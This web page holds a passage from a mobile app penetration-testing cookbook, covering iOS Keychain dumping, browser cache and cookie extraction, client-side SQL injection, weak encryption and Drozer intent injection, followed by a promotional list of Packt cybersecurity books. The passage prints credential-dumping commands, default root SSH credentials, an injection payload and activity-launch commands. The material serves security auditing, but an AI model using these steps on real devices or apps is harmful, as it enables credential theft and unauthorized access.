analyzer but other options and tools can also be employed. There are many challenges in doingdynamic analysis of iOS applications. You may like to use multiple tools and not just rely on one to overcome the challenges. See also https://code.google.com/p/snoop-it/ Auditing Android apps using a dynamic analyzer Examining iOS App Data storage and Keychain security vulnerabilities Keychain iniOS is an encrypted SQLite database that uses a 128-bit AES algorithm to hold identities and passwords. On any iOS device, theKeychain SQLite database is used to store user credentials such as usernames, passwords, encryption keys, certificates, and so on. Developers use this service API to instruct the operating system to store sensitive data securely, rather than using a less secure alternative storage mechanism such as a property list file or a configuration file. In this recipe we will be analyzing Keychain dump to discover stored credentials. Getting ready Please follow the given steps to prepare for Keychain dump analysis: Jailbreak the iPhone or iPad. Ensure the SSH server is running on the device (default after jailbreak). Download the Keychain_dumper binary from https://github.com/ptoomey3/Keychain-Dumper Connect the iPhone and the computer to the same Wi-Fi network. On the computer, run SSH into the iPhone by typing the iPhone IP address, username as root, and password as alpine. How to do it... Follow these steps toexamine security vulnerabilities in iOS: Copy keychain_dumper into the iPhone or iPad by issuing the following command: scp root@<device ip>:keychain_dumper private/var/tmp Alternatively, Windows WinSCP can be used to do the same: Once the binary has been copied, ensure the keychain-2.db has read access: chmod +r /private/var/Keychains/keychain-2.db This is shown in the following screenshot: Give executable right to binary: chmod 777 /private/var/tmp/keychain_dumper Now, we simply run keychain_dumper: /private/var/tmp/keychain_dumper This command will dump all keychain information, which will contain all the generic and Internet passwords stored in the keychain: How it works... Keychain in an iOS device is used to securely store sensitive information such as credentials, such as usernames, passwords, authentication tokens for different applications, and so on, along with connectivity (Wi-Fi/VPN) credentials and so on. It is located on iOS devices as an encrypted SQLite database file located at /private/var/Keychains/keychain-2.db. Insecurity arises when application developers use this feature of the operating system to store credentials rather than storing it themselves in NSUserDefaults, .plist files, and so on. To provide users the ease of not having to log in every time and hence saving the credentials in the device itself, the keychain information for every app is stored outside of its sandbox. There's more... This analysis can also be performed for specific apps dynamically, using tools such as Snoop-it. Follow the steps to hook Snoop-it to the target app, click on Keychain Values, and analyze the attributes to see its values reveal in the Keychain. More will be discussed in further recipes. Finding vulnerabilities in WAP-based mobile apps WAP-based mobile applications are mobile applications or websites that run on mobile browsers. Most organizations create a lightweight version of their complex websites to be able to run easily and appropriately in mobile browsers. For example, a hypothetical company called ABCXYZ may have their main website at www.abcxyz.com, while their mobile website takes the form m.abcxyz.com. Note that the mobile website (or WAP apps) are separate from their installable application form, such as .apk on Android. Since mobile websites run on browsers, it is very logical to say that most of the vulnerabilities applicable to web applications are applicable to WAP apps as well. However, there are caveats to this. Exploitability and risk ratings may not be the same. Moreover, not all attacks may be directly applied or conducted. Getting ready For this recipe, make sure to be ready with the following set of tools (in the case of Android): ADB WinSCP Putty Rooted Android mobile SSH proxy application installed on Android phone Let us see the common WAP application vulnerabilities. While discussing these, we will limit ourselves to mobilebrowsers only: Browser cache: Android browsers store cache in two different parts—content cache and component cache. Content cache may contain basic frontend components such as HTML, CSS, or JavaScript. Component cache contains sensitive data like the details to be populated once content cache is loaded. You have to locate the browser cache folder and find sensitive data in it. Browser memory: Browser memory refers to the location used by browsers to store the data. Memory is usually long-term storage, while cache is short-term. Browse through the browser memory space for various files such as .db, .xml, .txt, and so on. Check all these files for the presence of sensitive data. Browser history: Browser history contains the list of the URLs browsed by the user. These URLs in GET request format contain parameters. Again, our goal is to locate a URL with sensitive data for our WAP application. Cookies: Cookies are mechanisms for websites to keep track of user sessions. Cookies are stored locally in devices. Following are the security concerns with respect to cookie usage: Sometimes a cookie contains sensitive information Cookie attributes, if weak, may make the application security weak Cookie stealing may lead to a session hijack How to do it... Browser Cache: Let's look at the steps that need to be followed with browser cache: Android browser cache can be found at this location: /data/data/com.android.browser/cache/webviewcache/. You can use either ADB to pull the data from webviewcache, or use WinSCP/Putty and connect to SSH application in rooted Android phones. Either way, you will land up at the webviewcache folder and find arbitrarily named files. Refer to the highlighted section in the following screenshot: Rename the extension of arbitrarily named files to .jpg and you will be able to view the cache in screenshot format. Search through all files for sensitive data pertaining to the WAP app you are searching for. Browser Memory: Like an Android application, browser also has a memory space under the /data/data folder by the name com.android.browser (default browser). Here is how a typical browser memory space looks: Make sure you traverse through all the folders to get the useful sensitive data in the context of the WAP application you are looking for. Browser history Go to browser, locate options, navigate to History, and find the URLs present there. Cookies The files containing cookie values can be found at /data/data/com.android.browser/databases/webview.db. These DB files can be opened with the SQLite Browser tool and cookies can be obtained. There's more... Apart from the primary vulnerabilities described here mainly concerned with browser usage, all otherweb application vulnerabilities which are related to or exploited from or within a browser are applicable and need to be tested: Cross-site scripting, a result of a browser executing unsanitized harmful scripts reflected by the servers is very valid for WAP applications. The autocomplete attribute not turned to off may result in sensitive data remembered by the browser for returning users. This again is a source of data leakage. Browser thumbnails and image buffer are other sources to look for data. Above all, all the vulnerabilities in web applications, which may not relate to browser usage, apply. These include OWASP Top 10 vulnerabilities such as SQL injection attacks, broken authentication and session management, and so on. Business logic validation is another important check to bypass. All these are possible by setting a proxy to the browser and playing around with the mobile traffic. The discussion of this recipe has been around Android, but all the discussion is fully applicable to an iOS platform when testing WAP applications. Approach, steps to test, and the locations would vary, but all vulnerabilities still apply. You may want to try out iExplorer and plist editor tools when working with an iPhone or iPad. See also http://resources.infosecinstitute.com/browser-based-vulnerabilities-in-web-applications/ Finding client-side injection Client-side injection is a new dimension to the mobile threat landscape. Client side injection (also known as local injection) is a result of the injection of malicious payloads to local storage to reveal data not by the usual workflow of the mobile application. If 'or'1'='1 is injected in a mobile application on search parameter, where the search functionality is built to search in the local SQLite DB file, this results in revealing all data stored in the corresponding table of SQLite DB; client side SQL injection is successful. Notice that the payload did not to go the database on the server side (which possibly can be Oracle or MSSQL) but it did go to the local database (SQLite) in the mobile. Since the injection point and injectable target are local (that is, mobile), the attack is called a client side injection. Getting ready To get ready to find client side injection, have a few mobile applications ready to be audited and have a bunch of tools used in many other recipes throughout this book. Note that client side injection is not easy to find on account of the complexities involved; many a time you will have to fine-tune your approach as per the successful first signs. How to do it... The prerequisite to the existence of client side injection vulnerability in mobile apps is the presence of a local storage and an application feature which queries the local storage. For the convenience of the first discussion, let us learn client side SQL injection, which is fairly easy to learn as users know very well SQL Injection in web apps. Let us take the case of a mobile banking application which stores the branch details in a local SQLite database. The application provides a search feature to users wishing to search a branch. Now, if a person types in the city as Mumbai, the city parameter is populated with the value Mumbai and the same is dynamically added to the SQLite query. The query builds and retrieves the branch list for Mumbai city. (Usually, purely local features are provided for faster user experience and network bandwidth conservation.) Now if a user is able to inject harmful payloads into the city parameter, such as a wildcard character or a SQLite payload to the drop table, and the payloads execute revealing all the details (in the case of a wildcard) or the payload drops the table from the DB (in the case of a drop table payload) then you have successfully exploited client side SQL injection. Another type of client side injection, presented in OWASP Mobile TOP 10 release, is local cross-site scripting (XSS). Refer to slide number 22 of the original OWASP PowerPoint presentation here: http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks. They referred to it as Garden Variety XSS and presented a code snippet, wherein SMS text was accepted locally and printed at UI. If a script was inputted in SMS text, it would result in local XSS (JavaScript Injection). There's more... In a similar fashion, HTML Injection is also possible. If an HTML file contained in the application local storage can be compromised to contain malicious code and the application has a feature which loads or executes this HTML file, HTML injection is possible locally. A variant of the same may result in Local File Inclusion (LFI) attacks. If data is stored in the form of XML files in the mobile, local XML Injection can also be attempted. There could be morevariants of these attacks possible. Finding client-side injection is quite difficult and time consuming. It may need to employ both static and dynamic analysis approaches. Most scanners also do not support discovery of Client Side Injection. Another dimension to Client Side Injection is the impact, which is judged to be low in most cases. There is a strong counter argument to this vulnerability. If the entire local storage can be obtained easily in Android, then why do we need to conduct Client Side Injection? I agree to this argument in most cases, as the entire SQLite or XML file from the phone can be stolen, why spend time searching a variable that accepts a wildcard to reveal the data from the SQLite or XML file? However, you should still look out for this vulnerability, as HTML injection or LFI kind of attacks have malware-corrupted file insertion possibility and hence the impactful attack. Also, there are platforms such as iOS where sometimes, stealing the local storage is very difficult. In such cases, client side injection may come in handy. See also https://www.owasp.org/index.php/Mobile_Top_10_2014-M7 http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks Insecure encryption in mobile apps Encryption is one of the misused terms in information security. Some people confuse it with hashing, while others may implement encoding and call itencryption. symmetric key and asymmetric key are two types of encryption schemes. Mobile applications implement encryption to protect sensitive data in storage and in transit. While doing audits, your goal should be to uncover weak encryption implementation or the so-called encoding or other weaker forms, which are implemented in places where a proper encryption should have been implemented. Try to circumvent the encryption implemented in the mobile application under audit. Getting ready Be ready with a fewmobile applications and tools such as ADB and other file and memory readers, decompiler and decoding tools, and so on. How to do it... There are multiple types of faulty implementation ofencryption in mobile applications. There are different ways to discover each of them: Encoding (instead of encryption): Many a time, mobile app developers simply implement Base64 or URL encoding in applications (an example of security by obscurity). Such encoding can be discovered by simply doing static analysis. You can use the script discussed in the first recipe of this article for finding out such encoding algorithms. Dynamic analysis will help you obtain the locally stored data in encoded format. Decoders for these known encoding algorithms are available freely. Using any of those, you will be able to uncover the original value. Thus, such implementation is not a substitute for encryption. Serialization (instead of encryption): Another variation of faulty implementation is serialization. Serialization is the process of conversion of data objects to byte stream. The reverse process, deserialization, is also very simple and the original data can be obtained easily. Static Analysis may help reveal implementations using serialization. Obfuscation (instead of encryption): Obfuscation also suffers from similar problems and the obfuscated values can be deobfuscated. Hashing (instead of encryption): Hashing is a one-way process using a standard complex algorithm. These one-way hashes suffer from a major problem in that they can be replayed (without needing to recover the original data). Also, rainbow tables can be used to crack the hashes. Like other techniques described previously, hashing usage in mobile applications can also be discovered via static analysis. Dynamic analysis may additionally be employed to reveal the one-way hashes stored locally. How it works... To understand the insecure encryption in mobile applications, let us take a live case, which we observed. An example of weak custom implementation While testing a live mobile banking application, me and my colleagues came across a scenario where a userid and mpin combination was sent by a custom encoding logic. The encoding logic here was based on a predefined character by character replacement by another character, as per an in-built mapping. For example: 2 is replaced by 4 0 is replaced by 3 3 is replaced by 2 7 is replaced by = a is replaced by R A is replaced by N As you can notice, there is no logic to the replacement. Until you uncover or decipher the whole in-built mapping, you won't succeed. A simple technique is to supply all possible characters one-by-one and watch out for the response. Let's input userid and PIN as 222222 and 2222 and notice the converted userid and PIN are 444444 and 4444 respectively, as per the mapping above. Go ahead and keep changing the inputs, you will create a full mapping as is used in the application. Now steal the user's encoded data and apply the created mapping, thereby uncovering the original data. This whole approach is nicely described in the article mentioned under the See also section of this recipe. This is a custom example of faulty implementation pertaining to encryption. Such kinds of faults are often difficult to find in static analysis, especially in the case of difficult to reverse apps such as iOS applications. The possibility of automateddynamic analysis discovering this is also difficult. Manual testing and analysis stands, along with dynamic or automated analysis, a better chance of uncovering such customimplementations. There's more... Finally, I would share another application we came across. This one used proper encryption. The encryption algorithm was a well known secure algorithm and the key was strong. Still, the whole encryption process can be reversed. The application had two mistakes; we combined both of them to break the encryption: The application code had the standard encryption algorithm in the APK bundle. Not even obfuscation was used to protect the names at least. We used the simple process of APK to DEX to JAR conversion to uncover the algorithm details. The application had stored the strong encryption key in the local XML file under the /data/data folder of the Android device. We used adb to read this xml file and hence obtained the encryption key. According to Kerckhoff's principle, the security of a cryptosystem should depend solely on the secrecy of the key and the private randomizer. This is how all encryption algorithms are implemented. The key is the secret, not the algorithm. In our scenario, we could obtain the key and know the name of the encryption algorithm. This is enough to break the strong encryption implementation. See also http://www.paladion.net/index.php/mobile-phone-data-encryption-why-is-it-necessary/ Discovering data leakage sources Data leakage risk worries organizations across the globe and people have been implementing solutions to prevent data leakage. In the case of mobile applications, first we have to think what could be the sources or channels for data leakage possibility. Once this is clear, devise or adopt a technique to uncover each of them. Getting ready As in other recipes, here also you need bunch of applications (to be analyzed), an Android device or emulator, ADB, DEX to JAR converter, Java decompilers, Winrar, or Winzip. How to do it... To identify the data leakage sources, list down all possible sources you can think of for the mobile application under audit. In general, all mobile applications have the following channels of potential data leakage: Files stored locally Client side source code Mobile device logs Web caches Console messages Keystrokes Sensitive data sent over HTTP How it works... The next step is to uncover the data leakage vulnerability at these potential channels. Let us see the six previously identified common channels: Files stored locally: By this time, readers are very familiar with this. The data is stored locally in files like shared preferences, xml files, SQLite DB, and other files. In Android, these are located inside the application folder under /data/data directory and can be read using tools such as ADB. In iOS, tools such as iExplorer or SSH can be used to read the application folder. Client side source code: Mobile application source code is present locally in the mobile device itself. The source code in applications has been hardcoding data, and a common mistake is hardcoding sensitive data (either knowingly or unknowingly). From the field, we came across an application which had hardcoded the connection key to the connected PoS terminal. Hardcoded formulas to calculate a certain figure, which should have ideally been present in the server-side code, was found in the mobile app. Database instance names and credentials are also a possibility where the mobile app directly connects to a server datastore. In Android, the source code is quite easy to decompile via a two-step process—APK to DEX and DEX to JAR conversion. In iOS, the source code of header files can be decompiled up to a certain level using tools such as classdump-z or otool. Once the raw source code is available, a static string search can be employed to discover sensitive data in the code. Mobile device logs: All devices create local logs to store crash and other information, which can be used to debug or analyze a security violation. A poor coding may put sensitive data in local logs and hence data can be leaked from here as well. Android ADB command adb logcat can be used to read the logs on Android devices. If you use the same ADB command for the Vulnerable Bank application, you will notice the user credentials in the logs as shown in the following screenshot: Web caches: Web caches may also contain the sensitive data related to web components used in mobile apps. We discussed how to discover this in the WAP recipe in this article previously. Console messages: Console messages are used by developers to print messages to the console while application development and debugging is in progress. Console messages, if not turned off while launching the application (GO LIVE), may be another source of data leakage. Console messages can be checked by running the application in debug mode. Keystrokes: Certain mobile platforms have been known to cache key strokes. A malware or key stroke logger may take advantage and steal a user's key strokes, hence making it another data leakage source. Malware analysis needs to be performed to uncover embedded or pre-shipped malware or keystroke loggers with the application. Dynamic analysis also helps. Sensitive data sent over HTTP: Applications either send sensitive data over HTTP or use a weak implementation of SSL. In either case, sensitive data leakage is possible. Usage of HTTP can be found via static analysis to search for HTTP strings. Dynamic analysis to capture the packets at runtime also reveals whether traffic is over HTTP or HTTPS. There are various SSL-related weak implementation and downgrade attacks, which make data vulnerable to sniffing and hence data leakage. There's more... Data leakage sources can be vast and listing all of them does not seem possible. Sometimes there are applications or platform-specific data leakage sources, which may call for a different kind of analysis. Intent injection can be used to fire intents to access privileged contents. Such intents may steal protected data such as the personal information of all the patients in a hospital (under HIPPA compliance). iOS screenshot backgrounding issues, where iOS applications store screenshots with populated user input data, on the iPhone or iPAD when the application enters background. Imagine such screenshots containing a user's credit card details, CCV, expiry date, and so on, are found in an application under PCI-DSS compliance. Malwares give a totally different angle to data leakage. Note that data leakage is a very big risk organizations are tackling today. It is not just financial loss; losses may be intangible, such as reputation damage, or compliance or regulatory violations. Hence, it makes it very important to identify the maximum possible data leakage sources in the application and rectify the potential leakages. See also https://www.owasp.org/index.php/Mobile_Top_10_2014-M4 Launching intent injection in Android Other application-based attacks in mobile devices When we talk about application-based attacks, OWASP TOP 10 risks are the very first things that strike. OWASP (www.owasp.org) has a dedicated project to mobile security, which releases Mobile Top 10. OWASP gathers data from industry experts and ranks the top 10 risks every three years. It is a very good knowledge base for mobile application security. Here is the latest Mobile Top 10 released in the year 2014: M1: Weak Server Side Controls M2: Insecure Data Storage M3: Insufficient Transport Layer Protection M4: Unintended Data Leakage M5: Poor Authorization and Authentication M6: Broken Cryptography M7: Client Side Injection M8: Security Decisions via Untrusted Inputs M9: Improper Session Handling M10: Lack of Binary Protections Getting ready Have a few applications ready to be analyzed, use the same set of tools we have been discussing till now. How to do it... In this recipe, we restrict ourselves to other application attacks. The attacks which we have not covered till now in this book are: M1: Weak Server Side Controls M5: Poor Authorization and Authentication M8: Security Decisions via Untrusted Inputs M9: Improper Session Handling How it works... Currently, let us discuss client-side or mobile-side issues for M5, M8, and M9. M5: Poor Authorization and Authentication A few common scenarios which can be attacked are: Authentication implemented at device level (for example, PIN stored locally) Authentication bound on poor parameters (such as UDID or IMEI numbers) Authorization parameter responsible for access to protected application menus is stored locally These can be attacked by reading data using ADB, decompiling the applications, and conducting static analysis on the same or by doing dynamic analysis on the outgoing traffic. M8: Security Decisions via Untrusted Inputs This one talks about IPC. IPC entry points forapplications to communicate to one other, such as Intents in Android or URL schemes in iOS, are vulnerable. If the origination source is not validated, the application can be attacked. Malicious intents can be fired to bypass authorization or steal data. Let us discuss this in further detail in the next recipe. URL schemes are a way for applications to specify the launch of certain components. For example, the mailto scheme in iOS is used to create a new e-mail. If theapplications fail to specify the acceptable sources, any malicious application will be able to send a mailto scheme to the victim application and create new e-mails. M9: Improper Session Handling From a purely mobile device perspective, session tokens stored in .db files or oauth tokens, or strings granting access stored in weakly protected files, are vulnerable. These can be obtained by reading the local data folder using ADB. See also https://www.owasp.org/index.php/P;rojects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks Launching intent injection in Android Android uses intents to request action from another application component. A common communication is passing Intent to start a service. We will exploit this fact via an intent injection attack. An intent injection attack works by injecting intent into the application component to perform a task that is usually not allowed by the application workflow. For example, if the Android application has a login activity which, post successful authentication, allows you access to protected data via another activity. Now if an attacker can invoke the internal activity to access protected data by passing an Intent, it would be an Intent Injection attack. Getting ready Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and following the installation instructions mentioned in the User Guide. Install Drozer Console Agent and start a session as mentioned in the User Guide. If your installation is correct, you should get a Drozer command prompt (dz>).   How to do it... You should also have a few vulnerable applications to analyze. Here we chose the OWASP GoatDroid application: Start the OWASP GoatDroid Fourgoats application in emulator. Browse the application to develop understanding. Note that you are required to authenticate by providing a username and password, and post-authentication you can access profile and other pages. Here is the pre-login screen you get: Let us now use Drozer to analyze the activities of the Fourgoats application. The following Drozer command is helpful: run app.activity.info -a <package name> Drozer detects four activities with null permission. Out of these four, ViewCheckin and ViewProfile are post-login activities. Use Drozer to access these two activities directly, via the following command: run app.activity.start --component <package name> <activity name> We chose to access ViewProfile activity and the entire sequence of activities is shown in the following screenshot: Drozer performs some actions and the protected user profile opens up in the emulator, as shown here: How it works... Drozer passed an Intent in the background to invoke the post-login activity ViewProfile. This resulted in ViewProfile activity performing an action resulting in display of profile screen. This way, an intent injection attack can be performed using Drozer framework. There's more... Android usesintents also forstarting a service or delivering a broadcast. Intent injection attacks can be performed on services and broadcast receivers. A Drozer framework can also be used to launch attacks on the app components. Attackers may write their own attack scripts or use different frameworks to launch this attack. See also Using Drozer to find vulnerabilities in Android applications https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf Resources for Article: Further resources on this subject: Mobile Devices[article] Development of Windows Mobile Applications (Part 1)[article] Development of Windows Mobile Applications (Part 2)[article]
Read more
  • 0
  • 0
  • 30291

article-image-top-6-cybersecurity-books-from-packt-to-accelerate-your-career
Expert Network
28 Jun 2021
7 min read
Save for later

Top 6 Cybersecurity Books from Packt to Accelerate Your Career

Expert Network
28 Jun 2021
7 min read
With new technology threats, rising international tensions, and state-sponsored cyber-attacks, cybersecurity is more important than ever. In organizations worldwide, there is not only a dire need for cybersecurity analysts, engineers, and consultants but the senior management executives and leaders are expected to be cognizant of the possible threats and risk management. The era of cyberwarfare is now upon us. What we do now and how we determine what we will do in the future is the difference between whether our businesses live or die and whether our digital self-survives the digital battlefield.  In this article, we'll discuss 6 titles from Packt’s bank of cybersecurity resources for everyone from an aspiring cybersecurity professional to an expert. Adversarial Tradecraft in Cybersecurity  A comprehensive guide that helps you master cutting-edge techniques and countermeasures to protect your organization from live hackers. It enables you to leverage cyber deception in your operations to gain an edge over the competition.  Little has been written about how to act when live hackers attack your system and run amok. Even experienced hackers sometimes tend to struggle when they realize the network defender has caught them and is zoning in on their implants in real-time. This book provides tips and tricks all along the kill chain of an attack, showing where hackers can have the upper hand in a live conflict and how defenders can outsmart them in this adversarial game of computer cat and mouse.  This book contains two subsections in each chapter, specifically focusing on the offensive and defensive teams. Pentesters to red teamers, SOC analysis to incident response, attackers, defenders, general hackers, advanced computer users, and security engineers should gain a lot from this book. This book will also be beneficial to those getting into purple teaming or adversarial simulations, as it includes processes for gaining an advantage over the other team.  The author, Dan Borges, is a passionate programmer and security researcher who has worked in security positions for companies such as Uber, Mandiant, and CrowdStrike. Dan has been programming various devices for >20 years, with 14+ years in the security industry.  Cybersecurity – Attack and Defense Strategies, Second Edition  A book that enables you to counter modern threats and employ state-of-the-art tools and techniques to protect your organization against cybercriminals. It is a completely revised new edition of the bestselling book, covering the very latest security threats and defense mechanisms including a detailed overview of Cloud Security Posture Management (CSPM) and an assessment of the current threat landscape, with additional focus on new IoT threats and cryptomining.  This book is for IT professionals venturing into the IT security domain, IT pentesters, security consultants, or those looking to perform ethical hacking. Prior knowledge of penetration testing is beneficial.  This book is authored by Yuri Diogenes and Dr. Erdal Ozkaya. Yuri Diogenes is a professor at EC-Council University for their master's degree in cybersecurity and a Senior Program Manager at Microsoft for Azure Security Center. Dr. Erdal Ozkaya is a leading Cybersecurity Professional with business development, management, and academic skills who focuses on securing Cyber Space and sharing his real-life skills as a Security Advisor, Speaker, Lecturer, and Author.  Cyber Minds  This book comprises insights on cybersecurity across the cloud, data, artificial intelligence, blockchain, and IoT to keep you cyber safe. Shira Rubinoff's Cyber Minds brings together the top authorities in cybersecurity to discuss the emergent threats that face industries, societies, militaries, and governments today. Cyber Minds serves as a strategic briefing on cybersecurity and data safety, collecting expert insights from sector security leaders. This book will help you to arm and inform yourself of what you need to know to keep your business – or your country – safe.  This book is essential reading for business leaders, the C-Suite, board members, IT decision-makers within an organization, and anyone with a responsibility for cybersecurity.  The author, Shira Rubinoff is a recognized cybersecurity executive, cybersecurity and blockchain advisor, global keynote speaker, and influencer who has built two cybersecurity product companies and led multiple women-in-technology efforts.  Cyber Warfare – Truth, Tactics, and Strategies  Cyber Warfare – Truth, Tactics, and Strategies is as real-life and up-to-date as cyber can possibly be, with examples of actual attacks and defense techniques, tools, and strategies presented for you to learn how to think about defending your own systems and data.  This book introduces you to strategic concepts and truths to help you and your organization survive on the battleground of cyber warfare. The book not only covers cyber warfare, but also looks at the political, cultural, and geographical influences that pertain to these attack methods and helps you understand the motivation and impacts that are likely in each scenario.  This book is for any engineer, leader, or professional with either responsibility for cybersecurity within their organizations, or an interest in working in this ever-growing field.  The author, Dr. Chase Cunningham holds a Ph.D. and M.S. in computer science from Colorado Technical University and a B.S. from American Military University focused on counter-terrorism operations in cyberspace.  Incident Response in the Age of Cloud  This book is a comprehensive guide for organizations on how to prepare for cyber-attacks and control cyber threats and network security breaches in a way that decreases damage, recovery time, and costs, facilitating the adaptation of existing strategies to cloud-based environments.  It is aimed at first-time incident responders, cybersecurity enthusiasts who want to get into IR, and anyone who is responsible for maintaining business security. This book will also interest CIOs, CISOs, and members of IR, SOC, and CSIRT teams. However, IR is not just about information technology or security teams, and anyone with legal, HR, media, or other active business roles would benefit from this book.   The book assumes you have some admin experience. No prior DFIR experience is required. Some infosec knowledge will be a plus but isn’t mandatory.  The author, Dr. Erdal Ozkaya, is a technically sophisticated executive leader with a solid education and strong business acumen. Over the course of his progressive career, he has developed a keen aptitude for facilitating the integration of standard operating procedures that ensure the optimal functionality of all technical functions and systems.  Cybersecurity Threats, Malware Trends, and Strategies   This book trains you to mitigate exploits, malware, phishing, and other social engineering attacks. After scrutinizing numerous cybersecurity strategies, Microsoft's former Global Chief Security Advisor provides unique insights on the evolution of the threat landscape and how enterprises can address modern cybersecurity challenges.    The book will provide you with an evaluation of the various cybersecurity strategies that have ultimately failed over the past twenty years, along with one or two that have actually worked. It will help executives and security and compliance professionals understand how cloud computing is a game-changer for them.  This book is designed to benefit senior management at commercial sector and public sector organizations, including Chief Information Security Officers (CISOs) and other senior managers of cybersecurity groups, Chief Information Officers (CIOs), Chief Technology Officers (CTOs), and senior IT managers who want to explore the entire spectrum of cybersecurity, from threat hunting and security risk management to malware analysis.  The author, Tim Rains worked at Microsoft for the better part of two decades where he held a number of roles including Global Chief Security Advisor, Director of Security, Identity and Enterprise Mobility, Director of Trustworthy Computing, and was a founding technical leader of Microsoft's customer-facing Security Incident Response team.  Summary  If you aspire to become a cybersecurity expert, any good study/reference material is as important as hands-on training and practical understanding. By choosing a suitable guide, one can drastically accelerate the learning graph and carve out one’s own successful career trajectory. 
Read more
  • 0
  • 0
  • 30276
Modal Close icon
Modal Close icon